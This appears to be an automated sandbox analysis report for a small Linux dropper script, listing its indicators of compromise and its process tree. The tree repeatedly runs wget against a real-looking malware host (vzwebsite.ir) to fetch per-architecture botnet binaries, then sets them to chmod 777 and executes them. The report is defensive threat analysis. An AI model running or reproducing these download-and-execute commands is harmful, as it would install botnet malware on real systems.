2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6

Resubmissions

07/02/2023, 21:06

230207-zx6pfafa71 8

07/02/2023, 18:57

230207-xl7fgsge5t 8

Analysis

max time kernel
0s
max time network
1256s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20221111-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20221111-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
07/02/2023, 21:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6
Size

320B
MD5

d4c058db66b0e54c8a6ae4c967479675
SHA1

8fc148163e25f149fbe0d49faa5359d33a67e087
SHA256

2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6
SHA512

fcb8b851b40631fbc03f2e73045c92143ea6569eb8dcd82ca5335d7fa4c3d904041279cdadf7e9346af410eb9564b08256a0db6b448234eb4ed0785ceb94eaa2

Score

8^/10

Malware Config

Signatures

Modifies hosts file 15 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 15 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget

Reads runtime system information 15 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6	/tmp/2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6	2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6

/tmp/2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6
/tmp/2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6
1⤵
- Writes file to tmp directory
PID:618
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:619
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:620
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:621
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.arm7 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:622
- ./.rlds
  ./.rlds wget..arm7
  2⤵
  PID:628
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:629
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:630
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:631
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.arm4 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:632
- ./.rlds
  ./.rlds wget..arm4
  2⤵
  PID:633
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:634
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:635
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:636
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.arm5 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:637
- ./.rlds
  ./.rlds wget..arm5
  2⤵
  PID:638
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:639
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:640
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:641
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.arm6 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:642
- ./.rlds
  ./.rlds wget..arm6
  2⤵
  PID:643
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:644
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:645
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:646
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.armv4tl -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:647
- ./.rlds
  ./.rlds wget..armv4tl
  2⤵
  PID:648
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:649
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:650
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:651
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.mips64 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:652
- ./.rlds
  ./.rlds wget..mips64
  2⤵
  PID:653
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:654
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:655
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:656
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.mips -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:657
- ./.rlds
  ./.rlds wget..mips
  2⤵
  PID:658
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:659
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:660
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:661
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.mipsel -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:662
- ./.rlds
  ./.rlds wget..mipsel
  2⤵
  PID:663
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:664
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:665
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:666
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.ppc440 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:667
- ./.rlds
  ./.rlds wget..ppc440
  2⤵
  PID:668
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:669
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:670
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:671
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.powerpc -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:672
- ./.rlds
  ./.rlds wget..powerpc
  2⤵
  PID:673
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:674
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:675
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:676
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.m68k -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:677
- ./.rlds
  ./.rlds wget..m68k
  2⤵
  PID:678
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:679
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:680
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:681
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.sh4 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:682
- ./.rlds
  ./.rlds wget..sh4
  2⤵
  PID:683
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:684
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:685
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:686
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.sparc -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:687
- ./.rlds
  ./.rlds wget..sparc
  2⤵
  PID:688
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:689
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:690
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:691
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.x86_64 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:692
- ./.rlds
  ./.rlds wget..x86_64
  2⤵
  PID:693
- /bin/rm
  rm -rf .rlds
  2⤵
  PID:694
- /bin/cp
  cp .rlds
  2⤵
  - Reads runtime system information
  PID:695
- /bin/chmod
  chmod 777 .rlds
  2⤵
  PID:696
- /usr/bin/wget
  wget http://vzwebsite.ir/siffredi/dlz.i586 -O -
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:697
- ./.rlds
  ./.rlds wget..i586
  2⤵
  PID:698

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...